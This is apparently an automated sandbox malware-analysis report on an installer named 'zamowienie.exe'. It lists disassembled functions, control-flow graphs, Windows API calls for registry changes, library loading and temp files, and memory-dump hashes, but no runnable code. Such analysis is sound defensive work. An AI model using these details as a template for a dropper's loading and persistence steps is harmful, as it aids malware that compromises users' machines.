                                                                                                                                              Function 00402D60 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 737 402d60-402d89 call 406244 739 402d8e-402d92 737->739 740 402e43-402e47 739->740 741 402d98-402d9c 739->741 742 402dc1-402dd4 741->742 743 402d9e-402dbf RegEnumValueA 741->743 745 402dfd-402e04 RegEnumKeyA 742->745 743->742 744 402e28-402e36 RegCloseKey 743->744 744->740 746 402dd6-402dd8 745->746 747 402e06-402e18 RegCloseKey call 4067e6 745->747 746->744 748 402dda-402dee call 402d60 746->748 753 402e38-402e3e 747->753 754 402e1a-402e26 RegDeleteKeyA 747->754 748->747 755 402df0-402dfc 748->755 753->740 754->740 755->745
                                                                                                                                              APIs
                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1354259210-0
                                                                                                                                              • Opcode ID: 801702f539c1c9c5f4565a27d955d4b94d520761f7c046de30508d717588a551
                                                                                                                                              • Instruction ID: 801d9df1770ffd86eb1c5fc58f68876088f7be469cc693f16916dc059f142200
                                                                                                                                              • Opcode Fuzzy Hash: 801702f539c1c9c5f4565a27d955d4b94d520761f7c046de30508d717588a551
                                                                                                                                              • Instruction Fuzzy Hash: 38212872500108BBDF129F90CE89EEB7B6DEB54344F1100B6FA15B11A0E7B49F54AAA8
                                                                                                                                              Function 7340176B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 756 7340176b-734017a7 call 73401b28 760 734018c4-734018c6 756->760 761 734017ad-734017b1 756->761 762 734017b3-734017b9 call 7340233f 761->762 763 734017ba-734017c7 call 73402381 761->763 762->763 768 734017f7-734017fe 763->768 769 734017c9-734017ce 763->769 770 73401800-7340181c call 73402568 call 734015e9 call 734012f6 GlobalFree 768->770 771 7340181e-73401822 768->771 772 734017d0-734017d1 769->772 773 734017e9-734017ec 769->773 795 73401873-73401877 770->795 778 73401824-7340186a call 734015fb call 73402568 771->778 779 7340186c-73401872 call 73402568 771->779 776 734017d3-734017d4 772->776 777 734017d9-734017da call 73402ac8 772->777 773->768 774 734017ee-734017ef call 73402d53 773->774 787 734017f4 774->787 783 734017e1-734017e7 call 73402742 776->783 784 734017d6-734017d7 776->784 790 734017df 777->790 778->795 779->795 794 734017f6 783->794 784->768 784->777 787->794 790->787 794->768 799 734018b4-734018bb 795->799 800 73401879-73401887 call 7340252e 795->800 799->760 802 734018bd-734018be GlobalFree 799->802 806 73401889-7340188c 800->806 807 7340189f-734018a6 800->807 802->760 806->807 808 7340188e-73401896 806->808 807->799 809 734018a8-734018b3 call 73401572 807->809 808->807 810 73401898-73401899 FreeLibrary 808->810 809->799 810->807
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 73401B28: GlobalFree.KERNEL32(?), ref: 73401D99
                                                                                                                                                • Part of subcall function 73401B28: GlobalFree.KERNEL32(?), ref: 73401D9E
                                                                                                                                                • Part of subcall function 73401B28: GlobalFree.KERNEL32(?), ref: 73401DA3
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73401816
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 73401899
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 734018BE
                                                                                                                                                • Part of subcall function 7340233F: GlobalAlloc.KERNEL32(?,?), ref: 73402370
                                                                                                                                                • Part of subcall function 73402742: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,734017E7,00000000), ref: 73402812
                                                                                                                                                • Part of subcall function 734015FB: wsprintfA.USER32 ref: 73401629
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3962662361-3916222277
                                                                                                                                              • Opcode ID: b0ab3e371df1bc5bd5db3cafff14304fa3f34084c78c146ee8094b812eedc714
                                                                                                                                              • Instruction ID: f7cc66ba2de8b8d5c0860c31e0c1dd2a1327aaf7e315c51cd1a7f36e33a7587b
                                                                                                                                              • Opcode Fuzzy Hash: b0ab3e371df1bc5bd5db3cafff14304fa3f34084c78c146ee8094b812eedc714
                                                                                                                                              • Instruction Fuzzy Hash: 8241667A7003059BDB0DAF7589C4B9A37FCBF05214F1884F9E907AA2C6EB748545C7A8
                                                                                                                                              Function 00401C53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 813 401c53-401c73 call 402c3c * 2 818 401c75-401c7c call 402c5e 813->818 819 401c7f-401c83 813->819 818->819 821 401c85-401c8c call 402c5e 819->821 822 401c8f-401c95 819->822 821->822 823 401ce3-401d09 call 402c5e * 2 FindWindowExA 822->823 824 401c97-401cb3 call 402c3c * 2 822->824 838 401d0f 823->838 836 401cd3-401ce1 SendMessageA 824->836 837 401cb5-401cd1 SendMessageTimeoutA 824->837 836->838 839 401d12-401d15 837->839 838->839 840 402aea-402af9 839->840 841 401d1b 839->841 841->840
                                                                                                                                              APIs
                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                              • String ID: !
                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                              • Opcode ID: b6bcc65a827929111a22ef8807f04ba57a9b730f70127a06371d57fbf6220ec8
                                                                                                                                              • Instruction ID: 45db04a85bfdeda47cdbaa6b424aef0edc9d14ef5511eab511b9c6625d252f45
                                                                                                                                              • Opcode Fuzzy Hash: b6bcc65a827929111a22ef8807f04ba57a9b730f70127a06371d57fbf6220ec8
                                                                                                                                              • Instruction Fuzzy Hash: 9921B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF505B61D1C6B98681DB18
                                                                                                                                              Function 004024A3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 844 4024a3-4024d4 call 402c5e * 2 call 402cee 851 402aea-402af9 844->851 852 4024da-4024e4 844->852 854 4024f4-4024f7 852->854 855 4024e6-4024f3 call 402c5e lstrlenA 852->855 858 4024f9-40250d call 402c3c 854->858 859 40250e-402511 854->859 855->854 858->859 862 402522-402536 RegSetValueExA 859->862 863 402513-40251d call 403222 859->863 864 402538 862->864 865 40253b-402618 RegCloseKey 862->865 863->862 864->865 865->851
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz31BB.tmp,00000023,00000011,00000002), ref: 004024EE
                                                                                                                                              • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz31BB.tmp,00000000,00000011,00000002), ref: 0040252E
                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz31BB.tmp,00000000,00000011,00000002), ref: 00402612
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsz31BB.tmp
                                                                                                                                              • API String ID: 2655323295-221927066
                                                                                                                                              • Opcode ID: 491594fead15c208857a61d94fda6e3634ffefde9b2fff70cca63308956ea0f5
                                                                                                                                              • Instruction ID: 02cd6bd62d79ddcd0bf3460f84f94f2a69492218b1a9a9e082fdf026c7441117
                                                                                                                                              • Opcode Fuzzy Hash: 491594fead15c208857a61d94fda6e3634ffefde9b2fff70cca63308956ea0f5
                                                                                                                                              • Instruction Fuzzy Hash: 1111B171A00218AFEF10AFA1DE49AAE7A74EB44318F20443FF500F71C1C6B98D829B18
                                                                                                                                              Function 00405F80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 869 405f80-405f8a 870 405f8b-405fb6 GetTickCount GetTempFileNameA 869->870 871 405fc5-405fc7 870->871 872 405fb8-405fba 870->872 874 405fbf-405fc2 871->874 872->870 873 405fbc 872->873 873->874
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405F94
                                                                                                                                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,004034EF,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?), ref: 00405FAE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                              • API String ID: 1716503409-44229769
                                                                                                                                              • Opcode ID: 59e4d82f83d66f91c7d94536a43c00adebbc3ab435809a879064da4cd0aebbcc
                                                                                                                                              • Instruction ID: 12937e1f4e6a1a5479597ba02e30aba5a18f74b360abba49a4ee4feaf1ff52fb
                                                                                                                                              • Opcode Fuzzy Hash: 59e4d82f83d66f91c7d94536a43c00adebbc3ab435809a879064da4cd0aebbcc
                                                                                                                                              • Instruction Fuzzy Hash: 63F082363046047BEB108F69ED04B9B7B9DDF91750F10803BFA449A180D6B499548798
                                                                                                                                              Function 004020CA Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 875 4020ca-4020d6 876 402191-402193 875->876 877 4020dc-4020f2 call 402c5e * 2 875->877 879 40230a-40230f call 401423 876->879 886 402101-40210f LoadLibraryExA 877->886 887 4020f4-4020ff GetModuleHandleA 877->887 885 402aea-402af9 879->885 889 402111-40211e GetProcAddress 886->889 890 40218a-40218c 886->890 887->886 887->889 892 402120-402126 889->892 893 40215d-402162 call 405502 889->893 890->879 895 402128-402134 call 401423 892->895 896 40213f-402156 call 7340176b 892->896 897 402167-40216a 893->897 895->897 906 402136-40213d 895->906 899 402158-40215b 896->899 897->885 900 402170-402178 call 403b67 897->900 899->897 900->885 905 40217e-402185 FreeLibrary 900->905 905->885 906->897
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNELBASE(00000000,?,?), ref: 004020F5
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000,?), ref: 0040553B
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(Y/@,00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000), ref: 0040554B
                                                                                                                                                • Part of subcall function 00405502: lstrcatA.KERNEL32(00420130,0040A130,Y/@,00420130,00000000,00000000,00000000), ref: 0040555E
                                                                                                                                                • Part of subcall function 00405502: SetWindowTextA.USER32(00420130,00420130), ref: 00405570
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405596
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004055B0
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001013,?,00000000), ref: 004055BE
                                                                                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,?,?,?), ref: 00402105
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,?,?,?), ref: 0040217F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2987980305-0
                                                                                                                                              • Opcode ID: e7d6842dd2bd4aed8e7a87407c5e12e929ed2f65dba671a3f3b66e0855f0bdf3
                                                                                                                                              • Instruction ID: 370d2a15b3c3a0da37edf339bae304150d21b99b4ed7bb769de38b460a778b6f
                                                                                                                                              • Opcode Fuzzy Hash: e7d6842dd2bd4aed8e7a87407c5e12e929ed2f65dba671a3f3b66e0855f0bdf3
                                                                                                                                              • Instruction Fuzzy Hash: 4F21D832A00215ABCF10BF749F8DB6F7560AF40359F20413BF611B61D1CABD4A839A5E
                                                                                                                                              Function 004015E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405DE9: CharNextA.USER32(?,?,00421D58,?,00405E55,00421D58,00421D58,75923410,?,75922EE0,00405BA0,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405DF7
                                                                                                                                                • Part of subcall function 00405DE9: CharNextA.USER32(00000000), ref: 00405DFC
                                                                                                                                                • Part of subcall function 00405DE9: CharNextA.USER32(00000000), ref: 00405E10
                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,?,00000000,?), ref: 00401632
                                                                                                                                                • Part of subcall function 004059C8: CreateDirectoryA.KERNELBASE(?,?), ref: 00405A0A
                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218,00000000,00000000,?), ref: 00401661
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218, xrefs: 00401656
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218
                                                                                                                                              • API String ID: 1892508949-1600892969
                                                                                                                                              • Opcode ID: b6ab54f28c54dd7f2341348a03ae0867c9d1944202ae1c9cc63649d9d4b7fda5
                                                                                                                                              • Instruction ID: 157b4bccedebf6c9e2287589961cdb99d5f15c8de6e5b12a9796fa1ea18c9210
                                                                                                                                              • Opcode Fuzzy Hash: b6ab54f28c54dd7f2341348a03ae0867c9d1944202ae1c9cc63649d9d4b7fda5
                                                                                                                                              • Instruction Fuzzy Hash: FF112731A041409BDF307F754D41ABF26B0DE55764B28453FF891B22E2D63D49439A2F
                                                                                                                                              Function 00405476 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004054A5
                                                                                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 004054F6
                                                                                                                                                • Part of subcall function 004044AA: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004044BC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                              • Opcode ID: 412f85055a7b4b60e29cefcffd65736eb893493a2d5b05970a417412d487e36e
                                                                                                                                              • Instruction ID: 12f966ce1a0671afa2dd05d70597ed8da7d129dbf247362fa325f645efcbc9ea
                                                                                                                                              • Opcode Fuzzy Hash: 412f85055a7b4b60e29cefcffd65736eb893493a2d5b05970a417412d487e36e
                                                                                                                                              • Instruction Fuzzy Hash: D0018C71100608ABEF208F01DD84BDF3A65EB84316F504136FA04761D1C6798CD2DF69
                                                                                                                                              Function 004062A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,00420130,?,?,?,00000000,?,?,00406563,80000002), ref: 004062EB
                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,00406563,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,00420130), ref: 004062F6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID: Call
                                                                                                                                              • API String ID: 3356406503-1824292864
                                                                                                                                              • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                              • Instruction ID: 208613ee77dfe4ee95d70a32ca0665b8abc8502b02b40dd794cdc2c5f738bbaa
                                                                                                                                              • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                              • Instruction Fuzzy Hash: AE019A72100209AACF228F60CC09FDB3BA8EF84364F01403AFD16A6190D238D964CBA4
                                                                                                                                              Function 00406F0F Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
